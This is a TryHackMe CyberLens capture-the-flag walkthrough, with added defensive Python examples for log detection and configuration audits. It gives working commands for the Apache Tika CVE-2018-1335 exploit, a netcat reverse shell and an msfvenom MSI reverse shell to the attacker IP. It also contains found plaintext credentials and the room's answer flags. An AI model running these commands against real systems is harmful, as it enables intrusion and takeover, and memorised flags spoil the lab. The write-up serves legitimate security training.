TryHackMe | CyberLens

In this walkthrough, I demonstrate how I obtained complete ownership of the CyberLens room on TryHackMe
In: TryHackMe, Attack, CTF

Nmap Results

# Nmap 7.94SVN scan initiated Wed Jun 19 17:33:15 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.10.2.84
Nmap scan report for cyberlens.thm (10.10.2.84)
Host is up (0.075s latency).
Not shown: 65518 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.57 ((Win64))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.57 (Win64)
|_http-title: CyberLens: Unveiling the Hidden Matrix
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2024-06-18T21:30:11
|_Not valid after:  2024-12-18T21:30:11
| rdp-ntlm-info: 
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2024-06-19T21:34:46+00:00
|_ssl-date: 2024-06-19T21:34:54+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
61777/tcp open  http          Jetty 8.y.z-SNAPSHOT
|_http-title: Site doesn't have a title (text/plain).
|_http-cors: HEAD GET
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
| http-methods: 
|_  Potentially risky methods: PUT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-06-19T21:34:47
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun 19 17:34:54 2024 -- 1 IP address (1 host up) scanned in 98.53 seconds
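Triage of the scan above, as an added example that is not part of the walkthrough: it pulls the open ports out of an nmap normal-output (`-oN`) report and flags the findings a reviewer acts on first (risky HTTP methods, a snapshot build on the listener, RDP exposed, optional SMB signing). `SAMPLE_SCAN` is a constructed excerpt of the report shown above.

```python
"""Triage of an nmap normal-output (-oN) report.

Added example (not part of the walkthrough): it pulls the open ports out of the
scan text and flags the findings a reviewer acts on first. SAMPLE_SCAN is a
constructed excerpt of the report above.
"""
import re

SAMPLE_SCAN = """\
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.57 ((Win64))
| http-methods: 
|_  Potentially risky methods: TRACE
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
61777/tcp open  http          Jetty 8.y.z-SNAPSHOT
| http-methods: 
|_  Potentially risky methods: PUT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
RISKY_RE = re.compile(r"Potentially risky methods:\s*(.+)$")


def parse_scan(text):
    """Return (ports, host_scripts): one dict per port line, with the NSE output
    that follows a port attached to it; host-level script lines kept separately."""
    ports, host_scripts = [], []
    in_host = False
    for line in text.splitlines():
        if line.startswith("Host script results"):
            in_host = True
            continue
        m = PORT_RE.match(line)
        if m and not in_host:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip(), "script": []})
        elif line.startswith("|"):
            text_only = line.lstrip("|_ ").strip()
            (host_scripts if in_host or not ports else ports[-1]["script"]).append(text_only)
    return ports, host_scripts


def triage(text):
    """List (port, finding) pairs worth a ticket: risky HTTP methods, snapshot
    builds, exposed RDP, and SMB signing that is optional."""
    ports, host_scripts = parse_scan(text)
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        for s in p["script"]:
            rm = RISKY_RE.search(s)
            if rm:
                for method in rm.group(1).split():
                    findings.append((p["port"], f"HTTP {method} allowed"))
        if "SNAPSHOT" in p["version"]:
            findings.append((p["port"], "non-release build advertised: " + p["version"]))
        if p["port"] == 3389:
            findings.append((p["port"], "RDP exposed"))
    if any("signing enabled but not required" in s for s in host_scripts):
        findings.append((445, "SMB signing not required"))
    return findings


if __name__ == "__main__":
    for port, finding in triage(SAMPLE_SCAN):
        print(f"{port:>6}  {finding}")
```

Feed it the full `nmap-scan.txt` and the PUT on 61777 surfaces immediately, which is the thread the rest of this walkthrough pulls on.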





Service Enumeration

TCP/139,445

smbclient -N -L //cyberlens.thm

Check for anonymous SMB share access

No luck



TCP/80

Happy Path Testing

Walking the “happy path” · Pwning OWASP Juice Shop

Right now we know nothing about the website, so we click through and inspect things to understand what it does, submitting only expected values and nothing malicious. The goal at this stage is purely to understand the application.

Initial observations after interacting with the application:

  • The /contact.html page has a form that does nothing
  • The search bar does nothing
  • The /about.html page — CYBERLENS IMAGE EXTRACTOR — has an input field that takes any file and attempts to parse the file's metadata
    • It uses specific file parsers depending on the file's content type
    • When you submit the file, it makes a couple of HTTP requests to http://cyberlens.thm:61777/meta
      • HTTP OPTIONS request, the server responds with allowed methods
      • HTTP PUT request with the raw file contents as Content-Type: application/octet-stream, which is a raw byte stream to the server, after which the application reassembles the bytes and analyzes the file locally
Inspecting a .php file
Inspecting a .png file



Unhappy Path Testing

The interesting part of the application is the HTTP PUT call to http://cyberlens.thm:61777/meta. We should just be able to make requests directly to the server using curl.

Testing the File Upload

echo 'this is just a test' > /tmp/test.txt

Create a test file for use with curl

# -s : silent output
# -X : HTTP method
# -H 'Content-Type: application/octet-stream' : specify the sending content type
# -H 'Accept: application/json' : tell the application to return JSON
# -d '@/tmp/test.txt' : read the local file to send to the server

curl -s -X PUT -H 'Content-Type: application/octet-stream' \
-H 'Accept: application/json' -d '@/tmp/test.txt' \
http://cyberlens.thm:61777/meta | jq

Submit the file with curl and pipe to jq for formatting
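The same OPTIONS-then-PUT exchange, reproduced with the Python standard library against a local stand-in server. This is an added example and not code from the walkthrough or from Apache Tika: the stub server only sniffs two magic numbers and answers JSON so the client side (sending the same headers as the curl command) can run offline. The `/meta` path and the request headers come from the exchange described above; the `Allow` reply to OPTIONS and the magic-number table are assumptions of this example.

```python
"""OPTIONS + PUT against a /meta endpoint, client and stand-in server.

Added example, not part of the walkthrough and not Apache Tika: MetaStub only
mimics the shape of the exchange (sniff a magic number, answer JSON).
"""
import json
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed magic-number table standing in for the real content-type detection.
MAGIC = [(b"\x89PNG\r\n\x1a\n", "image/png"), (b"%PDF-", "application/pdf")]


def sniff_type(data):
    for sig, mime in MAGIC:
        if data.startswith(sig):
            return mime
    return "text/plain"


class MetaStub(BaseHTTPRequestHandler):
    def log_message(self, *args):  # keep the example quiet
        pass

    def do_OPTIONS(self):
        # Preflight: advertise the accepted methods (assumed reply shape).
        self.send_response(200)
        self.send_header("Allow", "PUT, OPTIONS")
        self.end_headers()

    def do_PUT(self):
        if self.path != "/meta":
            self.send_error(404)
            return
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        payload = json.dumps({"Content-Type": sniff_type(body),
                              "Content-Length": str(length)}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)


def start_stub():
    srv = HTTPServer(("127.0.0.1", 0), MetaStub)  # ephemeral port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch_meta(base_url, data):
    """Client side: OPTIONS to learn the allowed methods, then PUT the raw bytes
    as application/octet-stream and ask for JSON back, as the front end does."""
    opts = urllib.request.Request(base_url + "/meta", method="OPTIONS")
    with urllib.request.urlopen(opts) as r:
        allowed = [m.strip() for m in r.headers.get("Allow", "").split(",")]
    if "PUT" not in allowed:
        raise RuntimeError("server does not accept PUT on /meta")
    req = urllib.request.Request(base_url + "/meta", data=data, method="PUT",
                                 headers={"Content-Type": "application/octet-stream",
                                          "Accept": "application/json"})
    with urllib.request.urlopen(req) as r:
        return json.loads(r.read())


def demo():
    """Run the exchange twice: the text file from the curl test and a PNG header."""
    srv = start_stub()
    base = f"http://127.0.0.1:{srv.server_port}"
    try:
        text = fetch_meta(base, b"this is just a test\n")
        png = fetch_meta(base, b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
    finally:
        srv.shutdown()
        srv.server_close()
    return text, png


if __name__ == "__main__":
    print(demo())
```

Pointing `fetch_meta` at the real `http://cyberlens.thm:61777` returns the full Tika metadata document rather than the two keys the stub fakes.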



Probing the Server for More Information

The Apache Tika 1.17 output is particularly interesting
Exploiting CVE-2018-1335: Command Injection in Apache Tika
A walk-through of steps taken to go from an undisclosed CVE for a command injection vulnerability in the Apache tika-server to a complete exploit.
This looks promising—if we put together all the information we have found so far we should technically be able to make some kind of HTTP request to the server, set a header that looks like “X-Tika-OCRTesseractPath: <some command>” and have this command be inserted into the cmd string and be executed. The only problem is the “config.getTesseractPath()” is prepended to another string we cannot control, “getTesseractProg()” which ends up being a static string, “tesseract.exe”. To fix this we can wrap our command we want to execute in double quotes and Windows will ignore whatever is appended to it after the quotes, just executing our injected command.
  • Tika 1.17 is vulnerable to command injection via HTTP header X-Tika-OCRTesseractPath
  • The Java server does not sanitize inputs in this HTTP header, which defaults to tesseract.exe. However, as the author mentions, wrapping the payload in \"\" — escaped double quotes — causes Windows to parse the executable of our choosing
    • This works fine for executing single binaries, but we need a way to send process arguments along with the target binary
    • As the author points out, there are a few places we can control with specific inputs
💡
OCR is a technology for analyzing text data in image files, so we'll need to upload an image file in addition to using the OCR-specific HTTP headers. As the author notes, we can use Content-Type: image/jp2 to bypass checks for jpg magic bytes.

Effectively, cscript.exe becomes the OCR processing tool instead of tesseract.exe, and //E:JScript is passed as an argument to cscript.exe, which tells it to interpret the .tmp file with the JScript engine regardless of the file's extension.
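Detection logic for the pattern just described, as an added example that is not part of the walkthrough or the linked research: tika-server should never take OCR settings from a client, so any `X-Tika-OCR*` header on a request is a signal, and a tesseract path carrying quotes or shell metacharacters is the injection itself. The fix on the server side is to upgrade past 1.17 (CVE-2018-1335 was fixed in Tika 1.18) and keep the listener off untrusted networks. The log format (one dict per request with a headers map) and the events are constructed.

```python
"""Request-log detection for header-driven OCR configuration (CVE-2018-1335).

Added example, not from the walkthrough or the Rhino article. SAMPLE_LOG is a
constructed log in the shape: one dict per request with a headers map.
"""
import re

# Characters that have no business in a filesystem path to an OCR binary.
SUSPICIOUS_CHARS = re.compile(r"[\"'&|;<>$`]")

SAMPLE_LOG = [
    {"ts": "2024-06-19T21:40:01Z", "src": "10.10.5.17", "method": "PUT", "path": "/meta",
     "headers": {"Content-Type": "application/octet-stream", "Accept": "application/json"}},
    {"ts": "2024-06-19T21:41:12Z", "src": "10.10.9.201", "method": "PUT", "path": "/meta",
     "headers": {"Content-Type": "image/jp2",
                 "X-Tika-OCRTesseractPath": '"C:\\tools\\anything.exe"',  # constructed value
                 "X-Tika-OCRLanguage": "eng"}},
    {"ts": "2024-06-19T21:42:30Z", "src": "10.10.5.17", "method": "PUT", "path": "/meta",
     "headers": {"Content-Type": "image/png", "X-Tika-OCRLanguage": "eng"}},
]


def inspect_request(event):
    """Return the reasons a request looks like client-supplied parser config;
    an empty list means the request carried no OCR headers at all."""
    reasons = []
    headers = {k.lower(): v for k, v in event.get("headers", {}).items()}
    for name, value in headers.items():
        if not name.startswith("x-tika-ocr"):
            continue
        reasons.append(f"client-supplied OCR setting via {name}")
        if name == "x-tika-ocrtesseractpath" and SUSPICIOUS_CHARS.search(value):
            reasons.append("tesseract path contains quoting or shell metacharacters")
    return reasons


def scan_log(events):
    """Turn matching requests into alerts; quoting in the path header rates high,
    any other OCR header rates medium (a client tuning OCR language is still
    configuration it should not control)."""
    alerts = []
    for e in events:
        reasons = inspect_request(e)
        if not reasons:
            continue
        severity = "high" if any("metacharacters" in r for r in reasons) else "medium"
        alerts.append({"ts": e["ts"], "src": e["src"], "severity": severity,
                       "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(a["ts"], a["src"], a["severity"], "; ".join(a["reasons"]))
```

The rule keys on header names rather than on a specific binary, so it also catches variants that swap in a different interpreter.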





Exploit

CVEs/CVE-2018-1335/CVE-2018-1335.py at master · RhinoSecurityLabs/CVEs
A collection of proof-of-concept exploit scripts written by the team at Rhino Security Labs for various CVEs. - RhinoSecurityLabs/CVEs

As linked in the research article

ℹ️
I tried for a good bit to use curl and PowerShell to mimic the exact payload being sent by the python script. I even sent the python request through Burp, as well as curl and PowerShell. And despite the requests being completely identical, it seems there is something magical about the python-requests module that curl and PowerShell cannot match.

Testing the Exploit

wget https://raw.githubusercontent.com/RhinoSecurityLabs/CVEs/master/CVE-2018-1335/CVE-2018-1335.py -O pwn.py
sudo tcpdump -ni tun0 icmp

Start tcpdump and listen for ICMP traffic

python3 pwn.py cyberlens.thm 61777 'ping 10.6.63.22'

Run the exploit and try to ping our VPN IP address

Perfect!



Reverse Shell

cp /usr/share/windows-resources/binaries/nc.exe .

Copy the nc.exe binary to the current directory

sudo impacket-smbserver -smb2support -username evil -password evil myshare .

Start an authenticated SMB server with a share name of myshare

python3 pwn.py cyberlens.thm 61777 'net use F: \\\\10.6.63.22\\myshare /user:evil "evil"'

Map the share to the F: volume on the target

sudo rlwrap nc -lnvp 443

Start a TCP listener on port 443

python3 pwn.py cyberlens.thm 61777 'F:\\nc.exe 10.6.63.22 443 -e powershell.exe'

Run nc.exe from Kali over the SMB channel and connect to the TCP listener

ℹ️
The issue is likely me being impatient, but I had to run the exploit a few times in succession before the connection would establish





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Host Name:                 CYBERLENS
OS Name:                   Microsoft Windows Server 2019 Datacenter
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          EC2
Registered Organization:   Amazon.com
Product ID:                00430-00000-00000-AA344
Original Install Date:     3/17/2021, 2:59:06 PM
System Boot Time:          6/19/2024, 9:29:24 PM
System Manufacturer:       Xen
System Model:              HVM domU
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2300 Mhz
BIOS Version:              Xen 4.11.amazon, 8/24/2006
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC) Coordinated Universal Time
Total Physical Memory:     4,096 MB
Available Physical Memory: 2,941 MB
Virtual Memory: Max Size:  4,800 MB
Virtual Memory: Available: 3,329 MB
Virtual Memory: In Use:    1,471 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\CYBERLENS
Hotfix(s):                 27 Hotfix(s) Installed.
                           [01]: KB4601555
                           [02]: KB4470502
                           [03]: KB4470788
                           [04]: KB4480056
                           [05]: KB4486153
                           [06]: KB4493510
                           [07]: KB4499728
                           [08]: KB4504369
                           [09]: KB4512577
                           [10]: KB4512937
                           [11]: KB4521862
                           [12]: KB4523204
                           [13]: KB4535680
                           [14]: KB4539571
                           [15]: KB4549947
                           [16]: KB4558997
                           [17]: KB4562562
                           [18]: KB4566424
                           [19]: KB4570332
                           [20]: KB4577586
                           [21]: KB4577667
                           [22]: KB4587735
                           [23]: KB4589208
                           [24]: KB4598480
                           [25]: KB4601393
                           [26]: KB5000859
                           [27]: KB5001568
Network Card(s):           1 NIC(s) Installed.
                           [01]: AWS PV Network Device
                                 Connection Name: Ethernet
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.10.0.1
                                 IP address(es)
                                 [01]: 10.10.2.84
                                 [02]: fe80::c0dd:89a1:c4a5:7941    

Current User

User name                    CyberLens
Full Name                    
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/6/2023 7:10:41 PM
Password expires             Never
Password changeable          6/6/2023 7:10:41 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   6/19/2024 9:30:26 PM

Logon hours allowed          All

Local Group Memberships      *Remote Desktop Users *Users                
Global Group memberships     *None
USER INFORMATION
----------------

User Name           SID                                         
=================== ============================================
cyberlens\cyberlens S-1-5-21-1966530601-3185510712-10604624-1008


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users           Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled    



Users and Groups

Local Users

User accounts for \\CYBERLENS

-------------------------------------------------------------------------------
Administrator            CyberLens                DefaultAccount           
Guest                    WDAGUtilityAccount    

Local Groups

Aliases for \\CYBERLENS

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Storage Replica Administrators
*System Managed Accounts Group
*Users    



Network Configurations

Network Interfaces

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
   Link-local IPv6 Address . . . . . : fe80::c0dd:89a1:c4a5:7941%5
   IPv4 Address. . . . . . . . . . . : 10.10.2.84
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.10.0.1    



Processes and Services

Interesting Processes

Name        : java.exe
Owner       : CYBERLENS\CyberLens
CommandLine : "C:\Program Files\Eclipse Adoptium\jdk-17.0.7.7-hotspot\bin\java.exe" -cp 
              "C:\Apache-Tika\tika-server-1.17.jar;C:\Apache-Tika\jakarta.xml.bind-api-2.3.2.jar" 
              org.apache.tika.server.TikaServerCli --cors=* --host 0.0.0.0 --port=61777    
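A process-tree audit around that java.exe, as an added example that is not from the walkthrough: it flags the risky start-up options visible in the command line (`--host 0.0.0.0`, `--cors=*`, the 1.17 jar) and any child process other than tesseract.exe, which is the only helper an OCR-enabled tika-server is expected to launch (an assumption of this example). `SAMPLE_PROCS` is a constructed snapshot in the shape of pid / ppid / image / command line / user; only the java.exe command line is taken from the listing above.

```python
"""Process-tree audit for a tika-server java.exe.

Added example, not from the walkthrough. Flags exposure in the server's command
line and children it should never have. SAMPLE_PROCS is constructed; the
tika-server command line is the one observed on the box.
"""
import re

ALLOWED_CHILDREN = {"tesseract.exe"}  # assumption: the only helper the OCR path spawns

TIKA_CMD = ('"C:\\Program Files\\Eclipse Adoptium\\jdk-17.0.7.7-hotspot\\bin\\java.exe" -cp '
            '"C:\\Apache-Tika\\tika-server-1.17.jar;C:\\Apache-Tika\\jakarta.xml.bind-api-2.3.2.jar" '
            'org.apache.tika.server.TikaServerCli --cors=* --host 0.0.0.0 --port=61777')

SAMPLE_PROCS = [  # constructed snapshot
    {"pid": 4, "ppid": 0, "image": "System", "cmdline": "", "user": "NT AUTHORITY\\SYSTEM"},
    {"pid": 1520, "ppid": 700, "image": "java.exe", "cmdline": TIKA_CMD, "user": "CYBERLENS\\CyberLens"},
    {"pid": 3012, "ppid": 1520, "image": "tesseract.exe", "cmdline": "tesseract.exe input.tmp output",
     "user": "CYBERLENS\\CyberLens"},
    {"pid": 3340, "ppid": 1520, "image": "cmd.exe", "cmdline": "cmd.exe /c whoami",
     "user": "CYBERLENS\\CyberLens"},
    {"pid": 3350, "ppid": 3340, "image": "powershell.exe", "cmdline": "powershell.exe",
     "user": "CYBERLENS\\CyberLens"},
]


def find_tika_servers(procs):
    """A tika-server is a java.exe whose command line names the TikaServerCli main class."""
    return [p for p in procs if p["image"].lower() == "java.exe"
            and "org.apache.tika.server.tikaservercli" in p["cmdline"].lower()]


def exposure_findings(proc):
    """Configuration problems readable straight from the command line."""
    findings = []
    cmd = proc["cmdline"]
    if re.search(r"--host[= ]0\.0\.0\.0", cmd):
        findings.append("listens on all interfaces (--host 0.0.0.0)")
    if re.search(r"--cors[= ]\*", cmd):
        findings.append("wildcard CORS (--cors=*): any origin can drive the server from a browser")
    if re.search(r"tika-server-1\.17\.jar", cmd):
        findings.append("tika-server 1.17 on classpath (CVE-2018-1335, fixed in 1.18)")
    return findings


def descendants(procs, root_pid):
    """All processes below root_pid, walking the ppid links."""
    by_parent = {}
    for p in procs:
        by_parent.setdefault(p["ppid"], []).append(p)
    out, stack = [], [root_pid]
    while stack:
        pid = stack.pop()
        for child in by_parent.get(pid, []):
            out.append(child)
            stack.append(child["pid"])
    return out


def audit(procs):
    """One alert per exposure finding and per unexpected descendant of each tika-server."""
    alerts = []
    for srv in find_tika_servers(procs):
        for f in exposure_findings(srv):
            alerts.append({"kind": "config", "pid": srv["pid"], "detail": f})
        for child in descendants(procs, srv["pid"]):
            if child["image"].lower() not in ALLOWED_CHILDREN:
                alerts.append({"kind": "child", "pid": child["pid"],
                               "detail": f"{child['image']} under tika-server (ppid {child['ppid']})"})
    return alerts


if __name__ == "__main__":
    for a in audit(SAMPLE_PROCS):
        print(a["kind"], a["pid"], a["detail"])
```

Grandchildren are walked too, so an interpreter launched through cmd.exe is still attributed back to the server process.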



Interesting Files

C:\Users\CyberLens\Documents\Management\CyberLens-Management.txt

CyberLens
HackSmarter123    





Privilege Escalation

RDP as CyberLens

During the post-exploit enumeration phase, I was hunting around for interesting files and ran this PowerShell command, which revealed the file logged above:

cd ~
Get-ChildItem -Recurse -File -ErrorAction SilentlyContinue | Select-Object FullName

Command used to find the file with the username and password

xfreerdp /v:cyberlens.thm /u:CyberLens /p:HackSmarter123 /size:80% /drive:.,kali-share +clipboard

Enter Y to trust the RDP server certificate

PowerShell running in GUI on target



AlwaysInstallElevated

TryHackMe | Windows Privilege Escalation
In this post, I summarize lessons learned from two rooms covering Windows Privilege Escalation on TryHackMe

Going through my checklist of some quick wins...

AlwaysInstallElevated is enabled
You cannot install .msi files over the RDP session, due to the way the system security policies are configured, so we'll have to do this part back in our reverse shell
msfvenom -p windows/shell_reverse_tcp -f msi -o priv.msi LHOST=10.6.63.22 LPORT=443

Create a .msi file that will run a reverse shell connection back to Kali

I've still got my SMB share mapped to F:\, so copy the file locally
sudo rlwrap nc -lnvp 443

Start a TCP listener

cd ~/desktop
msiexec.exe /quiet /qn /i priv.msi

Run the .msi installer and connect back to Kali

We are NT AUTHORITY\SYSTEM
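A check for whether AlwaysInstallElevated is actually effective, as an added example that is not part of the walkthrough: the policy only applies when the REG_DWORD is 1 under both `HKLM` and `HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer`, so a reviewer parses the output of both `reg query` calls rather than trusting one hive. The sample outputs are constructed in the format reg query prints, including the error line for a missing key.

```python
"""AlwaysInstallElevated: parse both hives and decide whether the policy applies.

Added example, not from the walkthrough. The samples are constructed reg query
output; the policy is effective only when HKLM and HKCU both hold 1.
"""
import re

KEY_RE = re.compile(
    r"^(HKEY_LOCAL_MACHINE|HKEY_CURRENT_USER)\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer$", re.I)
VALUE_RE = re.compile(r"^\s+AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-f]+)\s*$", re.I)
HIVES = {"HKEY_LOCAL_MACHINE": "HKLM", "HKEY_CURRENT_USER": "HKCU"}

SAMPLE_BOTH = """\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
SAMPLE_HKLM_ONLY = """\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

ERROR: The system was unable to find the specified registry key or value.
"""
SAMPLE_DISABLED = """\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x0

HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""


def parse_reg_query(output):
    """Map hive -> DWORD value; None when the key or value is absent (or reg errored)."""
    values = {"HKLM": None, "HKCU": None}
    hive = None
    for line in output.splitlines():
        km = KEY_RE.match(line.strip())
        if km:
            hive = HIVES[km.group(1).upper()]
            continue
        vm = VALUE_RE.match(line)
        if vm and hive:
            values[hive] = int(vm.group(1), 16)
    return values


def policy_effective(values):
    """Windows Installer honours the policy only when both hives say 1."""
    return values.get("HKLM") == 1 and values.get("HKCU") == 1


def assess(output):
    """Return (effective, parsed values, verdict text) for a combined reg query dump."""
    values = parse_reg_query(output)
    effective = policy_effective(values)
    verdict = ("EFFECTIVE: any local user can install an MSI as SYSTEM; set both values to 0"
               if effective else "not effective: at least one hive is missing or 0")
    return effective, values, verdict


if __name__ == "__main__":
    for name, sample in [("both", SAMPLE_BOTH), ("hklm only", SAMPLE_HKLM_ONLY),
                         ("disabled", SAMPLE_DISABLED)]:
        print(name, assess(sample)[2])
```

Collect the two hives with `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer` and the matching `HKCU` query, concatenate the output, and hand it to `assess`.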



Flags

User

THM{T1k4-CV3-f0r-7h3-w1n}    

Root

THM{3lev@t3D-4-pr1v35c!}    